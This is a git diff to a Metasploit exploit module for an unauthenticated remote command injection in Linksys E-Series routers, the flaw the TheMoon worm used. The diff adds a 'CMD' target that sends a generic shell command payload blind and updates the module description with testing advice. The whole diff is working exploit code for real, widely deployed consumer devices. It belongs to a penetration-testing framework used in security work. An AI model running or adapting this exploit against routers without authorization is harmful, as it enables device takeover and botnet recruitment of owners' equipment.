diff --git a/modules/exploits/linux/http/linksys_themoon_exec_echo.rb b/modules/exploits/linux/http/linksys_themoon_exec_echo.rb index cedc9e5b44..33261f342c 100644 --- a/modules/exploits/linux/http/linksys_themoon_exec_echo.rb +++ b/modules/exploits/linux/http/linksys_themoon_exec_echo.rb @@ -16,8 +16,11 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Linksys E-Series TheMoon Remote Command Injection', 'Description' => %q{ Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command - injection. This vulnerability was used from the so called "TheMoon" worm. There - are many Systems that might be vulnerable: + injection. Since it is a blind os command injection vulnerability, there is no + output for the executed command when using the cmd generic payload. A ping + command against a controlled system could be used for testing purposes. This + vulnerability was used from the so called "TheMoon" worm. There are many Systems + that might be vulnerable: E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000, E900. This module was tested against a E1500 v1.0.5. }, @@ -46,6 +49,12 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Targets' => [ + [ 'CMD', + { + 'Arch' => ARCH_CMD, + 'Platform' => 'unix' + } + ], [ 'Linux mipsel Payload', { 'Arch' => ARCH_MIPSLE, @@ -107,6 +116,20 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end + if target.name =~ /CMD/ + if not (datastore['CMD']) + fail_with(Failure::BadConfig, "#{peer} - Only the cmd/generic payload is compatible") + end + cmd = payload.encoded + res = execute_command(cmd,"0") + if (!res) + fail_with(Failure::Unknown, "#{peer} - Unable to execute payload") + else + print_status("#{peer} - Blind Exploitation - unknown Exploitation state") + end + return + end + execute_cmdstager( :linemax => 26 )